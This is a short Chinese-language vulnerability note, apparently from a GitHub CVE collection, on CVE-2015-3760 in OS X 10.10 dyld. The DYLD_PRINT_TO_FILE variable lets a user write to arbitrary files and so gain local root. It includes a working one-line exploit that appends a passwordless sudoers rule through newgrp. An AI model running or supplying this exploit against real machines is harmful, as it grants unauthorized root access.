Skip to content

Latest commit

 

History

History
31 lines (18 loc) · 1008 Bytes

File metadata and controls

31 lines (18 loc) · 1008 Bytes

CVE-2015-3760

简要说明

OSX 10.10 里苹果在 dyld 加入了很多新的特性,其中一个是允许用户通过 DYLD_PRINT_TO_FILE 环境变量,将错误日志写入到任意文件

DYLD_PRINT_TO_FILE

This is a path to a (writable) file. Normally, the dynamic linker writes all logging output (triggered by DYLD_PRINT_* settings) to file descriptor 2 (which is usually stderr). But this setting causes the dynamic linker to write logging output to the specified file.

SUID 过的程序也可以利用该该特性,最终导致本地提权问题

影响范围

OS X 10.10

修复版本

OSX 10.11 (El Capitan)

利用方式

e.g 利用写任意文件的漏洞,获取 sudo 权限

echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s

参考文章